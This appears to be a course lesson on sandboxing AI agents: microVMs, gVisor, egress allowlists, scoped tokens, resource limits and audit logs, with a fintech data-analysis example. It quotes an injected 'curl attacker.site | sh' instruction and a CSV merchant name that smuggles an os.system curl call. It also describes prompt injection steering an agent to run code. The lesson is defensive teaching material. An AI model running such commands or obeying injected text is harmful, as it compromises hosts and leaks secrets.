Agentic AI Patterns

Course Content

Agentic AI Patterns

9 sections · 50 lessons

What is an execution environment in agent systems (e.g., sandboxing, secure runtimes)?


What stands between model-written code and your secretsMicroVM orgVisor per sessionRead-only image,small scratch dirNo network, or anegress allowlistShort-livedtokens, no keys in envCPU, memory and60-second limitsEvery commandin the audit logtopbottomThe malicious merchant name in the CSV had no network to reach.
Assume the agent is a hostile client, because anything it read may have been written by one.

What you need to know

Why agents need a sandbox

Coding agents, data-analysis agents and computer-use agents run code or drive a desktop. That code was written by a model that may have read a malicious web page or file. Without isolation, one injected instruction like "run curl attacker.site | sh" becomes a real compromise.

Isolation options

OptionIsolation strengthStart timeNotes
Plain containerShares host kernelFastFine for trusted code only
Container plus gVisorUser-space kernel intercepts syscallsFastGood default for untrusted code
MicroVM (Firecracker)Separate kernel per sandboxWell under a secondStrong isolation; common in hosted sandboxes
Full VMStrongestSlowestUsed for computer-use desktops

What a good environment has

  • One sandbox per session, destroyed at the end.
  • Filesystem policy: read-only base image, a small writable scratch folder, no host mounts.
  • Egress deny-by-default, with an allowlist of domains. This one control breaks most exfiltration attempts.
  • No ambient credentials. Short-lived tokens, scoped to the requesting user, injected per call.
  • Resource limits: CPU, memory, disk, process count, and a wall-clock timeout.
  • Audit log of every command, file write and network call.
  • Reproducibility: pinned image and captured inputs, so you can replay a run.

Computer-use agents

A computer-use agent sees screenshots and sends clicks and keystrokes. It should run in a disposable virtual desktop with only the needed apps, logged-out browsers where possible, and a human confirmation before purchases, sends or deletions.

A real-life example

A fintech gives analysts a data-analysis agent that writes and runs Python on uploaded CSVs of UPI transactions.

  • Each chat gets a microVM with Python and pandas, 2 CPUs, 4 GB RAM and a 60-second limit per execution.
  • No network at all. The uploaded file is copied in; results come out as files the host picks up.
  • A user uploads a CSV where one merchant name is "; import os; os.system('curl ...')". The model-written code only reads it as a string, and even if it ran, there is no network to reach.
  • One analyst's code loops forever on 8 million rows. The 60-second limit kills it and the agent is told "execution timed out; try sampling". It retries on a 5% sample.

Cost: a cold start adds about 300 ms to the first execution, which the team hides by starting the sandbox when the chat opens.

Follow-up questions to expect

  • "Is Docker enough?" — For trusted code, often. For model-generated or user-supplied code, add a stronger boundary like gVisor or a microVM, because containers share the host kernel.
  • "How does the agent keep files between sessions?" — Deliberately: write outputs to object storage or a database through a tool. Nothing on the sandbox disk survives.
  • "How do you give the sandbox API access safely?" — Through a proxy on an allowlist, with short-lived tokens scoped to the user, never keys in environment variables.